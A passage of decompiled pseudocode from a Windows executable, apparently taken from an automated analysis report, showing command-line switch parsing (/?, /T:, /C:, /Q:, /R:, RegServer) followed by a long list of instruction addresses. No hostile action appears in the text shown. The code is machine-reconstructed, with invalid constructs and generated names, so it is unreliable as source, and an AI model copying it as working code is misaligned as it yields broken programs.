                                                                                                                                                                                                                                      							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                      								E00406DC8(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                                                                      								_push(_t221);
                                                                                                                                                                                                                                      								_t222 = _t223;
                                                                                                                                                                                                                                      								_t71 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                      									0x4f0 = 2;
                                                                                                                                                                                                                                      									_t75 = E00405933( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									E00404495(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                      									 *0x409124 = E00406233();
                                                                                                                                                                                                                                      									_t75 = 0;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								return E00406C80(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                                                      										_t79 = _v268;
                                                                                                                                                                                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                      											if(_t83 == 0) {
                                                                                                                                                                                                                                      												_t202 = 0x521;
                                                                                                                                                                                                                                      												E00404495(0, 0x521, 0x401140, 0, 0x40, 0);
                                                                                                                                                                                                                                      												_t85 =  *0x408588; // 0x0
                                                                                                                                                                                                                                      												if(_t85 != 0) {
                                                                                                                                                                                                                                      													CloseHandle(_t85);
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												ExitProcess(0);
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											_t87 = _t83 - 4;
                                                                                                                                                                                                                                      											if(_t87 == 0) {
                                                                                                                                                                                                                                      												if(_v266 != 0) {
                                                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                      														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                      														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                      														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                      														_t202 = _t50;
                                                                                                                                                                                                                                      														do {
                                                                                                                                                                                                                                      															_t88 =  *_t183;
                                                                                                                                                                                                                                      															_t183 = _t183 + 1;
                                                                                                                                                                                                                                      														} while (_t88 != 0);
                                                                                                                                                                                                                                      														if(_t183 == _t202) {
                                                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                                                      															_t205 = 0x5b;
                                                                                                                                                                                                                                      															if(E00406627(_t215, _t205) == 0) {
                                                                                                                                                                                                                                      																L115:
                                                                                                                                                                                                                                      																_t206 = 0x5d;
                                                                                                                                                                                                                                      																if(E00406627(_t215, _t206) == 0) {
                                                                                                                                                                                                                                      																	L117:
                                                                                                                                                                                                                                      																	_t202 =  &_v276;
                                                                                                                                                                                                                                      																	_v276 = _t167;
                                                                                                                                                                                                                                      																	if(E00405BCB(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                                                      																		_t202 = 0x104;
                                                                                                                                                                                                                                      																		E004016A0(0x408c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                                                      																	_t202 = 0x5b;
                                                                                                                                                                                                                                      																	if(E00406627(_t215, _t202) == 0) {
                                                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                                                      																		goto L117;
                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                      																_t202 = 0x5d;
                                                                                                                                                                                                                                      																if(E00406627(_t215, _t202) == 0) {
                                                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                                                      																	goto L115;
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                      													 *0x408a24 = 1;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												goto L50;
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												_t100 = _t87 - 1;
                                                                                                                                                                                                                                      												if(_t100 == 0) {
                                                                                                                                                                                                                                      													L98:
                                                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                      														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                      														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                      														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                      														_t202 = _t38;
                                                                                                                                                                                                                                      														do {
                                                                                                                                                                                                                                      															_t101 =  *_t192;
                                                                                                                                                                                                                                      															_t192 = _t192 + 1;
                                                                                                                                                                                                                                      														} while (_t101 != 0);
                                                                                                                                                                                                                                      														if(_t192 == _t202) {
                                                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                                                      															_t202 =  &_v276;
                                                                                                                                                                                                                                      															_v276 = _t170;
                                                                                                                                                                                                                                      															if(E00405BCB(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                      																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                      																_t218 = 0x408b3e;
                                                                                                                                                                                                                                      																_t105 = _v276;
                                                                                                                                                                                                                                      																if(_t104 != 0x54) {
                                                                                                                                                                                                                                      																	_t218 = 0x408a3a;
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      																E004016A0(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                      																_t202 = 0x104;
                                                                                                                                                                                                                                      																E00406534(_t218, 0x104, 0x401140);
                                                                                                                                                                                                                                      																if(E004031D0(_t218) != 0) {
                                                                                                                                                                                                                                      																	goto L50;
                                                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                                                      																	goto L106;
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                      													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                      													if(_t111 == 0) {
                                                                                                                                                                                                                                      														if(_v266 != 0) {
                                                                                                                                                                                                                                      															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                      																_t199 = _v265;
                                                                                                                                                                                                                                      																if(_t199 != 0) {
                                                                                                                                                                                                                                      																	_t219 =  &_v265;
                                                                                                                                                                                                                                      																	do {
                                                                                                                                                                                                                                      																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                      																		if(_t115 == 0) {
                                                                                                                                                                                                                                      																			 *0x408a2c = 1;
                                                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                                                      																			_t200 = 2;
                                                                                                                                                                                                                                      																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                      																			if(_t119 == 0) {
                                                                                                                                                                                                                                      																				 *0x408a30 = 1;
                                                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                                                      																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                      																					 *0x408a34 = 1;
                                                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                                                      																					_t209 = 0;
                                                                                                                                                                                                                                      																				}
                                                                                                                                                                                                                                      																			}
                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                      																		_t118 =  *_t219;
                                                                                                                                                                                                                                      																		_t199 = _t118;
                                                                                                                                                                                                                                      																	} while (_t118 != 0);
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                                                      															 *0x408a2c = 1;
                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                      														goto L50;
                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                      														_t127 = _t111 - 3;
                                                                                                                                                                                                                                      														if(_t127 == 0) {
                                                                                                                                                                                                                                      															if(_v266 != 0) {
                                                                                                                                                                                                                                      																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                                                      																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                      																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                      																		goto L76;
                                                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                                                      																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                      																			goto L83;
                                                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                                                      																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                      																				goto L76;
                                                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                                                      																				goto L49;
                                                                                                                                                                                                                                      																			}
                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                      																L76:
                                                                                                                                                                                                                                      																_push(2);
                                                                                                                                                                                                                                      																_pop(1);
                                                                                                                                                                                                                                      																L83:
                                                                                                                                                                                                                                      																 *0x408a38 = 1;
                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                                                      															_t132 = _t127 - 1;
                                                                                                                                                                                                                                      															if(_t132 == 0) {
                                                                                                                                                                                                                                      																if(_v266 != 0) {
                                                                                                                                                                                                                                      																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                      																			goto L49;
                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                                                      																		_t201 = _v265;
                                                                                                                                                                                                                                      																		 *0x409a2c = 1;
                                                                                                                                                                                                                                      																		if(_t201 != 0) {
                                                                                                                                                                                                                                      																			_t220 =  &_v265;
                                                                                                                                                                                                                                      																			do {
                                                                                                                                                                                                                                      																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                      																				if(_t142 == 0) {
                                                                                                                                                                                                                                      																					_t143 = 2;
                                                                                                                                                                                                                                      																					 *0x409a2c =  *0x409a2c | _t143;
                                                                                                                                                                                                                                      																					goto L70;
                                                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                                                      																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                      																					if(_t145 == 0) {
                                                                                                                                                                                                                                      																						 *0x408d48 =  *0x408d48 | 0x00000040;
                                                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                                                      																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                      																						if(_t146 == 0) {
                                                                                                                                                                                                                                      																							 *0x409a2c =  *0x409a2c & 0xfffffffd;
                                                                                                                                                                                                                                      																							goto L70;
                                                                                                                                                                                                                                      																						} else {
                                                                                                                                                                                                                                      																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                      																							if(_t147 == 0) {
                                                                                                                                                                                                                                      																								 *0x409a2c =  *0x409a2c & 0xfffffffe;
                                                                                                                                                                                                                                      																								goto L70;
                                                                                                                                                                                                                                      																							} else {
                                                                                                                                                                                                                                      																								_t149 = _t147;
                                                                                                                                                                                                                                      																								if(_t149 == 0) {
                                                                                                                                                                                                                                      																									 *0x408d48 =  *0x408d48 | 0x00000080;
                                                                                                                                                                                                                                      																								} else {
                                                                                                                                                                                                                                      																									if(_t149 == 3) {
                                                                                                                                                                                                                                      																										 *0x409a2c =  *0x409a2c | 0x00000004;
                                                                                                                                                                                                                                      																										L70:
                                                                                                                                                                                                                                      																										 *0x408a28 = 1;
                                                                                                                                                                                                                                      																									} else {
                                                                                                                                                                                                                                      																										_t209 = 0;
                                                                                                                                                                                                                                      																									}
                                                                                                                                                                                                                                      																								}
                                                                                                                                                                                                                                      																							}
                                                                                                                                                                                                                                      																						}
                                                                                                                                                                                                                                      																					}
                                                                                                                                                                                                                                      																				}
                                                                                                                                                                                                                                      																				_t144 =  *_t220;
                                                                                                                                                                                                                                      																				_t201 = _t144;
                                                                                                                                                                                                                                      																			} while (_t144 != 0);
                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                                                      																	 *0x409a2c = 3;
                                                                                                                                                                                                                                      																	 *0x408a28 = 1;
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      																goto L50;
                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                      																if(_t132 == 0) {
                                                                                                                                                                                                                                      																	goto L98;
                                                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                                                      																	L49:
                                                                                                                                                                                                                                      																	_t209 = 0;
                                                                                                                                                                                                                                      																	L50:
                                                                                                                                                                                                                                      																	_t173 = _v272;
                                                                                                                                                                                                                                      																	if( *_t173 != 0) {
                                                                                                                                                                                                                                      																		goto L2;
                                                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                                                      																		break;
                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											goto L106;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                                                      										_t209 = 0;
                                                                                                                                                                                                                                      										break;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						goto L131;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if( *0x408a2c != 0 &&  *0x408b3e == 0) {
                                                                                                                                                                                                                                      						if(GetModuleFileNameA( *0x409a3c, 0x408b3e, 0x104) == 0) {
                                                                                                                                                                                                                                      							_t209 = 0;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t202 = 0x5c;
                                                                                                                                                                                                                                      							 *((char*)(E00406670(0x408b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t63 = _t209;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				L131:
                                                                                                                                                                                                                                      			}


































































                                                                                                                                                                                                                                      0x00405c50
                                                                                                                                                                                                                                      0x00405c5b
                                                                                                                                                                                                                                      0x00405c62
                                                                                                                                                                                                                                      0x00405c65
                                                                                                                                                                                                                                      0x00405c68
                                                                                                                                                                                                                                      0x00405c69
                                                                                                                                                                                                                                      0x00405c6a
                                                                                                                                                                                                                                      0x00405c6f
                                                                                                                                                                                                                                      0x004061b6
                                                                                                                                                                                                                                      0x00405c7d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405c7d
                                                                                                                                                                                                                                      0x00405c85
                                                                                                                                                                                                                                      0x00405c89
                                                                                                                                                                                                                                      0x00405ca6
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405ca6
                                                                                                                                                                                                                                      0x00405caa
                                                                                                                                                                                                                                      0x00405cb2
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405cb8
                                                                                                                                                                                                                                      0x00405cb8
                                                                                                                                                                                                                                      0x00405cc0
                                                                                                                                                                                                                                      0x00405cc2
                                                                                                                                                                                                                                      0x00405cc4
                                                                                                                                                                                                                                      0x00405cc6
                                                                                                                                                                                                                                      0x00405cc7
                                                                                                                                                                                                                                      0x00405cc9
                                                                                                                                                                                                                                      0x00405cfb
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405ccb
                                                                                                                                                                                                                                      0x00405ccb
                                                                                                                                                                                                                                      0x00405ccf
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405cf1
                                                                                                                                                                                                                                      0x00405cf1
                                                                                                                                                                                                                                      0x00405cfd
                                                                                                                                                                                                                                      0x00405cfd
                                                                                                                                                                                                                                      0x00405d01
                                                                                                                                                                                                                                      0x00405d3f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405d45
                                                                                                                                                                                                                                      0x00405d45
                                                                                                                                                                                                                                      0x00405d4c
                                                                                                                                                                                                                                      0x00405d4f
                                                                                                                                                                                                                                      0x00405d50
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405d50
                                                                                                                                                                                                                                      0x00405d03
                                                                                                                                                                                                                                      0x00405d0d
                                                                                                                                                                                                                                      0x00405d24
                                                                                                                                                                                                                                      0x004060ad
                                                                                                                                                                                                                                      0x004060ad
                                                                                                                                                                                                                                      0x004061b9
                                                                                                                                                                                                                                      0x004061bc
                                                                                                                                                                                                                                      0x004061bd
                                                                                                                                                                                                                                      0x004061c0
                                                                                                                                                                                                                                      0x004061c7
                                                                                                                                                                                                                                      0x00405d2a
                                                                                                                                                                                                                                      0x00405d2a
                                                                                                                                                                                                                                      0x00405d32
                                                                                                                                                                                                                                      0x00405d35
                                                                                                                                                                                                                                      0x00405d36
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405d36
                                                                                                                                                                                                                                      0x00405d0f
                                                                                                                                                                                                                                      0x00405d11
                                                                                                                                                                                                                                      0x00405d14
                                                                                                                                                                                                                                      0x00405d1a
                                                                                                                                                                                                                                      0x00405d16
                                                                                                                                                                                                                                      0x00405d16
                                                                                                                                                                                                                                      0x00405d16
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405d14
                                                                                                                                                                                                                                      0x00405d0d
                                                                                                                                                                                                                                      0x00405d01
                                                                                                                                                                                                                                      0x00405ccf
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405d51
                                                                                                                                                                                                                                      0x00405d51
                                                                                                                                                                                                                                      0x00405d57
                                                                                                                                                                                                                                      0x00405d5d
                                                                                                                                                                                                                                      0x00405d6c
                                                                                                                                                                                                                                      0x004061c8
                                                                                                                                                                                                                                      0x004061cd
                                                                                                                                                                                                                                      0x004061d0
                                                                                                                                                                                                                                      0x004061d1
                                                                                                                                                                                                                                      0x004061d9
                                                                                                                                                                                                                                      0x004061e0
                                                                                                                                                                                                                                      0x004061f7
                                                                                                                                                                                                                                      0x0040621a
                                                                                                                                                                                                                                      0x00406222
                                                                                                                                                                                                                                      0x004061f9
                                                                                                                                                                                                                                      0x00406205
                                                                                                                                                                                                                                      0x0040620f
                                                                                                                                                                                                                                      0x00406214
                                                                                                                                                                                                                                      0x00406214
                                                                                                                                                                                                                                      0x00406232
                                                                                                                                                                                                                                      0x00405d72
                                                                                                                                                                                                                                      0x00405d72
                                                                                                                                                                                                                                      0x00405d7c
                                                                                                                                                                                                                                      0x00405dd4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405d7e
                                                                                                                                                                                                                                      0x00405d80
                                                                                                                                                                                                                                      0x00405dd6
                                                                                                                                                                                                                                      0x00405dd6
                                                                                                                                                                                                                                      0x00405dde
                                                                                                                                                                                                                                      0x00405df9
                                                                                                                                                                                                                                      0x00405dfc
                                                                                                                                                                                                                                      0x00406184
                                                                                                                                                                                                                                      0x00406194
                                                                                                                                                                                                                                      0x00406199
                                                                                                                                                                                                                                      0x004061a0
                                                                                                                                                                                                                                      0x004061a3
                                                                                                                                                                                                                                      0x004061a3
                                                                                                                                                                                                                                      0x004061aa
                                                                                                                                                                                                                                      0x004061aa
                                                                                                                                                                                                                                      0x00405e02
                                                                                                                                                                                                                                      0x00405e05
                                                                                                                                                                                                                                      0x004060bb
                                                                                                                                                                                                                                      0x004060d1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004060d7
                                                                                                                                                                                                                                      0x004060e9
                                                                                                                                                                                                                                      0x004060ec
                                                                                                                                                                                                                                      0x004060ee
                                                                                                                                                                                                                                      0x004060f0
                                                                                                                                                                                                                                      0x004060f0
                                                                                                                                                                                                                                      0x004060f3
                                                                                                                                                                                                                                      0x004060f3
                                                                                                                                                                                                                                      0x004060f5
                                                                                                                                                                                                                                      0x004060f6
                                                                                                                                                                                                                                      0x004060fc
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406102
                                                                                                                                                                                                                                      0x00406104
                                                                                                                                                                                                                                      0x0040610e
                                                                                                                                                                                                                                      0x00406122
                                                                                                                                                                                                                                      0x00406124
                                                                                                                                                                                                                                      0x0040612e
                                                                                                                                                                                                                                      0x00406142
                                                                                                                                                                                                                                      0x00406142
                                                                                                                                                                                                                                      0x00406148
                                                                                                                                                                                                                                      0x00406157
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040615d
                                                                                                                                                                                                                                      0x0040616b
                                                                                                                                                                                                                                      0x00406178
                                                                                                                                                                                                                                      0x00406178
                                                                                                                                                                                                                                      0x00406130
                                                                                                                                                                                                                                      0x00406132
                                                                                                                                                                                                                                      0x0040613c
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040613c
                                                                                                                                                                                                                                      0x00406110
                                                                                                                                                                                                                                      0x00406112
                                                                                                                                                                                                                                      0x0040611c
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040611c
                                                                                                                                                                                                                                      0x0040610e
                                                                                                                                                                                                                                      0x004060fc
                                                                                                                                                                                                                                      0x004060bd
                                                                                                                                                                                                                                      0x004060c0
                                                                                                                                                                                                                                      0x004060c0
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405e0b
                                                                                                                                                                                                                                      0x00405e0b
                                                                                                                                                                                                                                      0x00405e0e
                                                                                                                                                                                                                                      0x00406001
                                                                                                                                                                                                                                      0x00406008
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040600e
                                                                                                                                                                                                                                      0x00406020
                                                                                                                                                                                                                                      0x00406023
                                                                                                                                                                                                                                      0x00406025
                                                                                                                                                                                                                                      0x00406027
                                                                                                                                                                                                                                      0x00406027
                                                                                                                                                                                                                                      0x0040602a
                                                                                                                                                                                                                                      0x0040602a
                                                                                                                                                                                                                                      0x0040602c
                                                                                                                                                                                                                                      0x0040602d
                                                                                                                                                                                                                                      0x00406033
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406039
                                                                                                                                                                                                                                      0x00406039
                                                                                                                                                                                                                                      0x0040603f
                                                                                                                                                                                                                                      0x0040604e
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406054
                                                                                                                                                                                                                                      0x0040605c
                                                                                                                                                                                                                                      0x00406064
                                                                                                                                                                                                                                      0x00406069
                                                                                                                                                                                                                                      0x0040606f
                                                                                                                                                                                                                                      0x00406071
                                                                                                                                                                                                                                      0x00406071
                                                                                                                                                                                                                                      0x00406088
                                                                                                                                                                                                                                      0x00406092
                                                                                                                                                                                                                                      0x00406099
                                                                                                                                                                                                                                      0x004060a7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004060a7
                                                                                                                                                                                                                                      0x0040604e
                                                                                                                                                                                                                                      0x00406033
                                                                                                                                                                                                                                      0x00405e14
                                                                                                                                                                                                                                      0x00405e14
                                                                                                                                                                                                                                      0x00405e17
                                                                                                                                                                                                                                      0x00405f85
                                                                                                                                                                                                                                      0x00405f9b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405fa1
                                                                                                                                                                                                                                      0x00405fa1
                                                                                                                                                                                                                                      0x00405fa9
                                                                                                                                                                                                                                      0x00405faf
                                                                                                                                                                                                                                      0x00405fb5
                                                                                                                                                                                                                                      0x00405fb8
                                                                                                                                                                                                                                      0x00405fc3
                                                                                                                                                                                                                                      0x00405fc6
                                                                                                                                                                                                                                      0x00405fef
                                                                                                                                                                                                                                      0x00405fc8
                                                                                                                                                                                                                                      0x00405fca
                                                                                                                                                                                                                                      0x00405fcb
                                                                                                                                                                                                                                      0x00405fcd
                                                                                                                                                                                                                                      0x00405fe5
                                                                                                                                                                                                                                      0x00405fcf
                                                                                                                                                                                                                                      0x00405fd2
                                                                                                                                                                                                                                      0x00405fdb
                                                                                                                                                                                                                                      0x00405fd4
                                                                                                                                                                                                                                      0x00405fd4
                                                                                                                                                                                                                                      0x00405fd4
                                                                                                                                                                                                                                      0x00405fd2
                                                                                                                                                                                                                                      0x00405fcd
                                                                                                                                                                                                                                      0x00405ff4
                                                                                                                                                                                                                                      0x00405ff6
                                                                                                                                                                                                                                      0x00405ff8
                                                                                                                                                                                                                                      0x00405ffc
                                                                                                                                                                                                                                      0x00405fa9
                                                                                                                                                                                                                                      0x00405f87
                                                                                                                                                                                                                                      0x00405f8a
                                                                                                                                                                                                                                      0x00405f8a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405e1d
                                                                                                                                                                                                                                      0x00405e1d
                                                                                                                                                                                                                                      0x00405e20
                                                                                                                                                                                                                                      0x00405f3d
                                                                                                                                                                                                                                      0x00405f4b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405f51
                                                                                                                                                                                                                                      0x00405f59
                                                                                                                                                                                                                                      0x00405f61
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405f63
                                                                                                                                                                                                                                      0x00405f65
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405f67
                                                                                                                                                                                                                                      0x00405f69
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405f6b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405f6b
                                                                                                                                                                                                                                      0x00405f69
                                                                                                                                                                                                                                      0x00405f65
                                                                                                                                                                                                                                      0x00405f61
                                                                                                                                                                                                                                      0x00405f3f
                                                                                                                                                                                                                                      0x00405f3f
                                                                                                                                                                                                                                      0x00405f3f
                                                                                                                                                                                                                                      0x00405f41
                                                                                                                                                                                                                                      0x00405f73
                                                                                                                                                                                                                                      0x00405f73
                                                                                                                                                                                                                                      0x00405f73
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405e26
                                                                                                                                                                                                                                      0x00405e26
                                                                                                                                                                                                                                      0x00405e29
                                                                                                                                                                                                                                      0x00405e52
                                                                                                                                                                                                                                      0x00405e6f
                                                                                                                                                                                                                                      0x00405f2b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405f31
                                                                                                                                                                                                                                      0x00405e75
                                                                                                                                                                                                                                      0x00405e75
                                                                                                                                                                                                                                      0x00405e7e
                                                                                                                                                                                                                                      0x00405e86
                                                                                                                                                                                                                                      0x00405e88
                                                                                                                                                                                                                                      0x00405e8e
                                                                                                                                                                                                                                      0x00405e91
                                                                                                                                                                                                                                      0x00405e9c
                                                                                                                                                                                                                                      0x00405e9f
                                                                                                                                                                                                                                      0x00405ef1
                                                                                                                                                                                                                                      0x00405ef2
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405ea1
                                                                                                                                                                                                                                      0x00405ea1
                                                                                                                                                                                                                                      0x00405ea4
                                                                                                                                                                                                                                      0x00405ee6
                                                                                                                                                                                                                                      0x00405ea6
                                                                                                                                                                                                                                      0x00405ea6
                                                                                                                                                                                                                                      0x00405ea9
                                                                                                                                                                                                                                      0x00405edd
                                                                                                                                                                                                                                      0x00000000
